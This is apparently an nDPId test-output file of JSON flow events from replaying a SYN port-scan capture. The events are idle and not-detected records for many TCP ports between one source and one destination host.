-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":893,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":893,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1035,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1035,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":962,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":962,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2008,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1884,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2008,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1884,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":951,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":951,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1004,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1004,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6112,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
